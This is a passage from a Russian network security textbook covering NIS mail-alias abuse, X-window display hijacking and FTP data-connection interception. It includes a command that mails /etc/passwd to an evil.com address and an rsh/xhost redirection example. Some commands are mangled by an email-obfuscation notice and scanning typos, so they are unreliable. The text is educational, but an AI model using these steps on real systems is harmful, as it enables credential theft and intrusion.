Использование службы NIS

Активный NIS-сервер управляет почтовыми псевдонимами (aliases) для доменов NIS. Подобно рассмотренным вариантам атак с помощью псевдонимов локальной почты, можно создать почтовые псевдонимы, которые будут выполнять команды, когда им приходит почта. Например, рассмотрим создание псевдонима «foo», который посылает по почте файл паролей на evil.com, когда на его адрес поступает любое сообщение: nis-master # echo Too: "| mail Этот адрес e-mail защищен от спам-ботов. Чтобы увидеть его, у Вас должен быть включен Java-Script < /etc/passwd »/etc/aliases nis-master # cd /var/yp nis-master # make aliases nis-master # echo test | mail -v Этот адрес e-mail защищен от спам-ботов. Чтобы увидеть его, у Вас должен быть включен Java-Script

Таким образом, становится ясно, что NIS - ненадежная служба, которая почти не имеет аутентификации клиентов и серверов. Если атакующий управляет активным NIS-сервсром, то он также сможет эффективно управлять хостами клиентов (например, сможет выполнять произвольные команды).

Особенности безопасности X-window

Все сетевые службы, кроме portmapper, могут быть обнаружены с помощью перебора всех сетевых портов. Многие сетевые утилиты и оконные системы работают с конкретными портами (например, sendmail - с портом 25, telnet - с портом 23). Порт X-window обычно 6000. Без дополнительной защиты окна X-window могут быть захвачены или просмотрены, ввод пользователя может быть украден, программы могут быть удаленно выполнены и т. п. Одним из методов определения уязвимости X- ссрвсра является подсоединение к нему через функцию XOpcnDisplay (). Если функция возвращает не NULL, то можно получить доступ к дисплею.

Х-терминалы, гораздо менее мощные системы, могут иметь свои проблемы по части безопасности. Многие Х-терминалы разрешают неограничснный rsh-доступ, позволяя запустить Х-клиенты на терминале victim, перенаправляя вывод на локальный терминал: evil% xhost +xvictim.victim.com evil% rsh xvictim.victim.com telnet victim.com -display evil.com

В любом случае необходимо продумать безопасность вашей системы X-Window, поскольку иначе система будет подвергаться такому же риску, как и при наличии «+» в hosts.eguiv или отсутствии пароля у root. FT-амаки

FTP-серверы могут работать в двух режимах: активном и пассивном. В активном режиме, когда начинается передача данных, клиент начинает прослушивание ТСР2порта и сообщает серверу, какой порт он прослушивает, после чего сервер открывает TCP-соединение с порта 20 на порт, указанный клиентом. Затем данные передаются через это соединение. В пассивном режиме, клиент сообщает серверу, что он готов к передаче данных и сервер начинает прослушивать неспециальный TCP-порт и сообщает клиенту, который именно. Затем клиент открывает TCP-соединение на порт указанный сервером и обмен данными происходит через это соединение.

Проблема этих вспомогательных соединений в том, что существующая спецификация FTP-протокола не предусматривает какого-либо метода проверки того, что клиент или сервер, который установил соединение, это именно тот, кто запросил это соединение в управляющем сеансе. Это в сочетании с фактом того, что многие операционные системы назначают ТСР- порты последовательно в возрастающем порядке, означает, что в результате в FTP-протоколе создаются условия, позволяющие атакующей стороне перехватить данные, которые передает кто-либо другой, или подменить данные. Эти атаки слегка отличаются в активном и пассивном режимах. Когда передача данных осуществляется в активном режиме, атакующая сторона угадывает номер TCP-порта, на котором конечный клиент ожидает соединения. Затем атакующий непрерывно посылает FTP-серверу, к которому подключен клиент, команды PORT ip,of,client,machine,port,port RETR filename или STOR filename. Используется RETR, если надо подменить данные передаваемые клиенту, или STOR, если надо перехватить данные от клиента к серверу. Или атакующий может использовать атаки, основанные на знании TCP sequence number, и подменить сеанс связи от сервера к клиенту. Правда, используя этот тип атак, невозможно перехватить данные, можно только подменить их своими.

При непродуманной реализации протокола FTP-клиент может не проверять порт и IP-адрес сервера. В таком случае необходимость такой атаки просто отпадает. В тоже время, 4.2BSD FTP-клиенты делают такую проверку, а это означает, что большая часть клиентов также делает подобную проверку. В пассивном режиме все несколько по-иному. Ни Solaris 2.5 (SVR4) FTP-сервср, ни WU-ftpd, наиболее распространенные основы FTP- серверов, игнорируют проверку IP-адресов вторичных соединений, инициированных клиентом. Это означает, что передачи в пассивном режиме не только уязвимы против атак, аналогичных атакам в активном режиме, включая какой-либо тип доступа клиенту или угадывание sequence number, но и обычного ТСР-сосдинсния из любого места Сети достаточно, чтобы перехватить или подменить данные. Чтобы реализовать эти недостатки разработки, атакующему достаточно угадать TCP-порт, который сервер будет слушать в следующем сеансе передачи данных и постоянно обстреливать его попытками соединений. Если сервер попытается послать данные клиенту, данные будут посланы атакующему. И наоборот, если атакующий может послать данные на сервер, подменяя данные, которые собирался передать клиент.

 
Посмотреть оригинал
< Пред   СОДЕРЖАНИЕ   ОРИГИНАЛ     След >